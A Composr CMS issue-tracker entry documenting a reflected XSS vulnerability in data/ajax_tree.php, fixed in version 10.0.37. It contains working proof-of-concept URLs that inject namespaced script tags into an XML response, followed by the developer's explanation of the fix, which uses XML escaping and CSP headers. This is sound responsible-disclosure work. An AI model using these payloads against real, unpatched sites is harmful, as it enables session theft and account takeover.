4633: Reflected Cross Site Scripting (XSS) - Composr CMS feature tracker

ID	Project	Category	View Status	Date Submitted	Last Update

4633	Composr	core	private	2021-03-31 08:04	2021-04-02 17:32

Reporter	Guest	Assigned To	Chris Graham
Priority	normal	Severity	Security-hole
Status	resolved	Resolution	fixed
Product Version	10.0.36
Fixed in Version	10.0.37

Summary	4633: Reflected Cross Site Scripting (XSS)
Description	Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim's browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts.
Steps To Reproduce	For the exploit gets done, you have to follow below steps. 1. Visit your web URL for the testing our lab is https://cve.iqsademo.com/composr/ 2. On the file https://cve.iqsademo.com/composr/data/ajax_tree.php there have a parameter called default which is vulnerable 3. Execute the following payload https://cve.iqsademo.com/composr/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<html><head></head><body><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script><a:script xmlns:a="http://www.w3.org/1999/xhtml">alert("XSS")</a:script><info><name><value><![CDATA[<script>confirm(document.domain)</script>]]></value></name><description><value>Hello</value></description><url><value>http://google.com</value></url></info></body></html> 4. It will give you two pop up with the message "Hello" & "XSS"
Tags	Type: Security
Attach Tags	(Separate by ",")
Attached Files	Xss POC.wmv (927,814 bytes) Xss POC.wmv (927,814 bytes) Screenshot.JPG (43,955 bytes) Screenshot.JPG (43,955 bytes)

Time estimation (hours)
Sponsorship open

Date Added	Member	Amount Sponsored

Chris Graham 2021-04-01 03:25 administrator ~7042	This is confirmed.

Guest 2021-04-01 06:48 reporter ~7044	Thank You, Waiting for the resolution.

Chris Graham 2021-04-01 15:49 administrator ~7045	Simpler test case: http://example-site/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script> The JavaScript is executing within the XML mime type via XML namespaces. Resolution is simple but we need to be careful to assume that XSS is not able to happen within other XML outputs.

Chris Graham 2021-04-01 19:54 administrator ~7046	I don't think any of the developers were aware that JavaScript could be embedded in XML responses like this. Knowing this now, I have gone over all the XML responses and checked either XML or HTML escaping is used (preferably XML, but HTML will work in practice and is secure). Additionally as a secondary layer of defense, CSP headers will be put out to disable JavaScript for these requests - and I have tested that works.

Guest 2021-04-01 21:59 reporter ~7049	Thank You. Waiting for the fix.

admin 2021-04-02 02:31 administrator ~7053	Automated response: XSS in an XML script One particular AJAX script that produces XML may be manipulated to output executable arbitrary JavaScript code. An XSS vulnerability is one whereby a hacker crafts a vulnerable URL that they then trick a target user (such as the webmaster) to access, causing the code to run on their machine and potentially expose things such as login cookies.

admin 2021-04-02 02:31 administrator ~7054	Fixed in git commit 833a06466 (https://gitlab.com/composr-foundation/composr/commit/833a06466 - link will become active once code pushed to GitLab)

Guest 2021-04-02 10:29 reporter ~7058	We're going to request a CVE for that. Let us know when you guys are prepare. Thank You.

Chris Graham 2021-04-02 15:57 administrator ~7059	A new patch version is out, and the issues are announced and mitigated. That means this (and the other security issue) are completed from our end, unless something else comes up. Let me know if you need something specific from us.

Guest 2021-04-02 17:32 reporter ~7060	A Certificate Of Appreciation Will Be A Great motivation. Author: Orion Hridoy Company: BugsBD Private LTD.

Date Modified	Username	Field
2021-03-31 08:04	Guest	New Issue
2021-03-31 08:04	Guest	Tag Attached: Type: Security
2021-03-31 08:04	Guest	File Added: Xss POC.wmv
2021-03-31 08:04	Guest	File Added: Screenshot.JPG
2021-04-01 03:25	Chris Graham	Note Added: 0007042
2021-04-01 06:48	Guest	Note Added: 0007044
2021-04-01 15:49	Chris Graham	Note Added: 0007045
2021-04-01 19:54	Chris Graham	Note Added: 0007046
2021-04-01 21:59	Guest	Note Added: 0007049
2021-04-02 10:29	Guest	Note Added: 0007058
2021-04-02 15:57	Chris Graham	Note Added: 0007059
2021-04-02 17:32	Guest	Note Added: 0007060

View Issue Details

Sponsor

Activities

Issue History